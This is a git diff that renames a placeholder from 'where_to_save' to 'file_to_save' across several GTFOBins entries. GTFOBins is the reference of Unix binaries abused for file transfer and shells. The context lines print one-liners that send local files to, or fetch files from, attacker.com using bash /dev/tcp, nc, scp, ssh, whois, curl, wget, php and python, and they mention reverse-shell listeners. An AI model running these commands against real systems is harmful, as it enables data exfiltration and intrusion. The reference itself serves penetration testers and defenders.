diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index 5be8eea..be7b655 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -13,7 +13,7 @@ functions:
 export RPORT=12345
 export LFILE=file_to_send
 bash -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file.
+ - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
 code: |
 export RHOST=attacker.com
 export RPORT=12345
diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md
index 68f77e5..8539b89 100644
--- a/_gtfobins/curl.md
+++ b/_gtfobins/curl.md
@@ -10,6 +10,6 @@ functions:
 - description: Fetch a remote file via HTTP GET request.
 code: |
 URL=http://attacker.com/file_to_get
- LFILE=where_to_save
+ LFILE=file_to_save
 curl $URL -o $LFILE
 ---
diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md
index 85fe375..7386e3f 100644
--- a/_gtfobins/ksh.md
+++ b/_gtfobins/ksh.md
@@ -13,7 +13,7 @@ functions:
 export RPORT=12345
 export LFILE=file_to_send
 ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file.
+ - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
 code: |
 export RHOST=attacker.com
 export RPORT=12345
diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md
index d4415a2..fc4e27b 100644
--- a/_gtfobins/nc.md
+++ b/_gtfobins/nc.md
@@ -1,7 +1,7 @@
 ---
 functions:
 upload:
- - description: Send a file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file.
+ - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
 code: |
 RHOST=attacker.com
 RPORT=12345
@@ -11,7 +11,7 @@ functions:
 - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
 code: |
 LPORT=12345
- LFILE=where_to_save
+ LFILE=file_to_save
 nc -l -p $LPORT > "$LFILE"
 reverse-shell-interactive:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
diff --git a/_gtfobins/php.md b/_gtfobins/php.md
index 20e869f..6dc7765 100644
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@@ -38,7 +38,7 @@ functions:
 - description: Fetch a remote file via HTTP GET request.
 code: |
 export URL=http://attacker.com/file_to_get
- export LFILE=where_to_save
+ export LFILE=file_to_save
 php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
 reverse-shell-interactive:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md
index e9cc15c..ea943c0 100644
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@@ -20,7 +20,7 @@ functions:
 - description: Fetch a remote file via HTTP GET request.
 code: |
 export URL=http://attacker.com/file_to_get
- export LFILE=where_to_save
+ export LFILE=file_to_save
 python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
 reverse-shell-interactive:
 - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md
index 3db6232..9796842 100644
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
@@ -20,7 +20,7 @@ functions:
 - description: Fetch a remote file via HTTP GET request.
 code: |
 export URL=http://attacker.com/file_to_get
- export LFILE=where_to_save
+ export LFILE=file_to_save
 python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
 reverse-shell-interactive:
 - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md
index 870b69f..9cc7489 100644
--- a/_gtfobins/scp.md
+++ b/_gtfobins/scp.md
@@ -24,13 +24,13 @@ functions:
 upload:
 - description: Send local file to a SSH server.
 code: |
- RPATH=user@attacker.com:~/where_to_save
+ RPATH=user@attacker.com:~/file_to_save
 LPATH=file_to_send
 scp $LFILE $RPATH
 download:
 - description: Fetch a remote file from a SSH server.
 code: |
 RPATH=user@attacker.com:~/file_to_get
- LFILE=where_to_save
+ LFILE=file_to_save
 scp $RPATH $LFILE
 ---
diff --git a/_gtfobins/sftp.md b/_gtfobins/sftp.md
index ef10773..8c528e8 100644
--- a/_gtfobins/sftp.md
+++ b/_gtfobins/sftp.md
@@ -15,11 +15,11 @@ functions:
 code: |
 RHOST=user@attacker.com
 sftp $RHOST
- put file_to_send where_to_save
+ put file_to_send file_to_save
 download:
 - description: Fetch a remote file from a SSH server.
 code: |
 RHOST=user@attacker.com
 sftp $RHOST
- get file_to_get where_to_save
+ get file_to_get file_to_save
 ---
diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md
index 5ae09aa..71c5e10 100644
--- a/_gtfobins/ssh.md
+++ b/_gtfobins/ssh.md
@@ -13,13 +13,13 @@ functions:
 code: |
 HOST=user@attacker.com
 RPATH=file_to_get
- LPATH=where_to_save
+ LPATH=file_to_save
 ssh $HOST "cat $RPATH" > $LPATH
 upload:
 - description: Send local file to a SSH server.
 code: |
 HOST=user@attacker.com
- RPATH=where_to_save
+ RPATH=file_to_save
 LPATH=file_to_send
 ssh $HOST "cat > $RPATH" < $LPATH
 file-read:
diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md
index f8dffb8..1c141e6 100644
--- a/_gtfobins/wget.md
+++ b/_gtfobins/wget.md
@@ -10,6 +10,6 @@ functions:
 - description: Fetch a remote file via HTTP GET request.
 code: |
 export URL=http://attacker.com/file_to_get
- export LFILE=where_to_save
+ export LFILE=file_to_save
 wget $URL -O $LFILE
 ---
diff --git a/_gtfobins/whois.md b/_gtfobins/whois.md
index ec39b9b..f0e0d21 100644
--- a/_gtfobins/whois.md
+++ b/_gtfobins/whois.md
@@ -3,13 +3,13 @@ description: |
 `whois` hangs waiting for the remote peer to close the socket.
 functions:
 upload:
- - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
+ - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
 code: |
 RHOST=attacker.com
 RPORT=12345
 LFILE=file_to_send
 whois -h $RHOST -p $RPORT "`cat $LFILE`"
- - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "where_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
+ - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
 code: |
 RHOST=attacker.com
 RPORT=12345
@@ -20,12 +20,12 @@ functions:
 code: |
 RHOST=attacker.com
 RPORT=12345
- LFILE=where_to_save
+ LFILE=file_to_save
 whois -h $RHOST -p $RPORT > "$LFILE"
 - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
 code: |
 RHOST=attacker.com
 RPORT=12345
- LFILE=where_to_save
+ LFILE=file_to_save
 whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
 ---